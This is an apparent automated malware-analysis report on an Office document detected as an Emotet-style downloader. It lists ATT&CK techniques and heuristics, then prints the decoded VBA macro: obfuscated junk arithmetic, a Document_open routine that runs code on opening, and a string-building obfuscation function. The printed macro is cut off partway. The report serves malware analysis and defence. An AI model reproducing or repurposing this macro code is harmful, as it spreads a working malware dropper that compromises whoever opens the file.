Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro, and a critical heuristic firing for Shell() calls within VBA. This indicates the macro is designed to execute arbitrary commands. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The VBA script's obfuscated nature and the presence of Shell() calls suggest it likely downloads and executes a second-stage payload, a common technique for malware droppers.
Heuristics (5)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42394 bytes |

SHA-256: 3eb570307b7d309746221bc9e37b183fae837bbbee4034de9081ea3a405ca3f9

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "IHnhGEm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub OOpQzT(iCtLP)
WHBuNI = 11849 - CDbl(1464 / Int(21664) - 35130 / Round(2315 / CSng(1760 - CByte(10643)))) * bWzOr * Fix(58511) - 98414 / CByte(pTqpN) / ZjcpXL - CBool(955) / EAfHN / Atn(87623)
End Sub
Sub woPsw(HEfTlm)
ShDXv = 27060 - CDbl(51842 / Int(52491) - 79789 / Round(22603 / CSng(56266 - CByte(89022)))) * SSzik * Fix(33359) - 10797 / CByte(sfbzOE) / fzWmZ - CBool(62568) / WwIMzS / Atn(53418)
cmziU = 79727 - CDbl(14656 / Int(94664) - 67324 / Round(38664 / CSng(62338 - CByte(38822)))) * CcajJJ * Fix(92386) - 85424 / CByte(rVocvA) / YSnXlD - CBool(78118) / kkcXzn / Atn(34818)
MQUThf = 80430 - CDbl(18431 / Int(61032) - 28461 / Round(74485 / CSng(91050 - CByte(55374)))) * stGWKB * Fix(87329) - 92669 / CByte(zoavYj) / sCYcb - CBool(22544) / hsscds / Atn(42994)
End Sub
Sub tWuri(dcQzQ)
UfHjQd = 14102 - CDbl(42738 / Int(69648) - 43078 / Round(995 / CSng(27619 - CByte(62881)))) * ZiSZP * Fix(7556) - 35653 / CByte(uDBjzH) / aIcLk - CBool(12934) / lILAk / Atn(262)
WWjLQr = 97965 - CDbl(18051 / Int(82836) - 68077 / Round(23532 / CSng(17323 - CByte(72419)))) * DijfzG * Fix(18937) - 26515 / CByte(CwLXs) / NPSSD - CBool(46347) / VVhQQQ / Atn(33734)
End Sub
Private Sub Document_open()
On Error Resume Next
zbVRha = 53106 - CDbl(40751 / Int(71604) - 87313 / Round(42794 / CSng(17487 - CByte(97744)))) * OETFwd * Fix(38092) - 87000 / CByte(iMWMOz) / qswiDV - CBool(81630) / Lkmuh / Atn(48083)
Application.Run PisHcw + "CjnWYLzmF" + SoZGk, FKNNXB + ZVzJBLuQ + dMUZt
OuOrZ = 22080 - CDbl(33849 / Int(3570) - 94496 / Round(78486 / CSng(39359 - CByte(13536)))) * mfaIE * Fix(94965) - 70724 / CByte(ABXYX) / VDCNSN - CBool(26544) / QDwAuS / Atn(70354)
End Sub
Sub VsGBP(CEQcI)
NsrSC = 60938 - CDbl(91960 / Int(97059) - 90336 / Round(52573 / CSng(3751 - CByte(87003)))) * DPXLE * Fix(5339) - 34243 / CByte(rjiSV) / wAzzq - CBool(10088) / UXLiz / Atn(28702)
mNuqN = 88487 - CDbl(22444 / Int(16041) - 59800 / Round(87541 / CSng(23270 - CByte(49267)))) * rWMNAj * Fix(29509) - 95472 / CByte(ziLnEj) / LhGnuh - CBool(57527) / nFbEpV / Atn(7479)
QOMwLw = 57103 - CDbl(32746 / Int(99192) - 49054 / Round(77832 / CSng(30765 - CByte(30671)))) * ZpcQTM * Fix(11402) - 72630 / CByte(JsaavF) / Hbtsv - CBool(49046) / kjNDpo / Atn(40668)
End Sub
Sub NWIflc(CrfiS)
FkYiL = 78681 - CDbl(34035 / Int(24174) - 42915 / Round(44146 / CSng(68785 - CByte(99380)))) * rkGJQz * Fix(51829) - 32578 / CByte(ERPTii) / CNQHp - CBool(59922) / oVdzDj / Atn(83853)
End Sub
Sub Yjokow(Ohrlaj)
SrGim = 38584 - CDbl(17618 / Int(36928) - 85724 / Round(14136 / CSng(24408 - CByte(78126)))) * nnwXk * Fix(75158) - 9799 / CByte(jfwtdT) / jPEEPi - CBool(4840) / tUtXqF / Atn(76133)
XAiubj = 38370 - CDbl(1532 / Int(76670) - 52622 / Round(24940 / CSng(67644 - CByte(23559)))) * pJAJj * Fix(55628) - 5591 / CByte(ZilAF) / rPPov - CBool(96371) / twZXAv / Atn(7027)
End Sub
Attribute VB_Name = "nVTZlfjXj"
Sub KiPaw(aiQJY)
YnOjv = 21122 - CDbl(51226 / Int(72668) - 68585 / Round(63897 / CSng(98564 - CByte(84885)))) * NSaTXH * Fix(84908) - 66943 / CByte(lTLTC) / zWius - CBool(53034) / jLEkYw / Atn(89357)
End Sub
Function ZVzJBLuQ()
On Error Resume Next
jVkpip = 89093 - CDbl(35929 / Int(69428) - 33235 / Round(92559 / CSng(2309 - CByte(40802)))) * QRDsqw * Fix(54914) - 6493 / CByte(dCjnKQ) / VFOzP - CBool(74159) / bJvFTU / Atn(13197)
ncsLoWGYLd = trPpFO("qHX'+'8S'+'+XmJX+mJX8SmJX+mJXw-omJX+mJXbjecXmJX+mJX8S+X8StX8S)mJX+mJX rmh4B.3", brlqU - brlqU + 4 + brlqU - brlqU, brlqU - brlqU + 69 + brlqU - brlqU)
vLzrwp = 91130 - CDbl(50472 / Int(16162) - 25025 / Round(56394 / CSng(64124 - CByte(14537)))) * CBjBPv * Fix(82149) - 74456 / CByte(NdXci) / tIihzG - CBool(40219) / TSfafG / Atn(70076)
RHMpHj = 36485 - CDbl(16199 / Int(61752) - 99649 / Round(32332 / CSng(33177 - CByte(16171)))) * jdVjw * Fix(31883) -
... (truncated)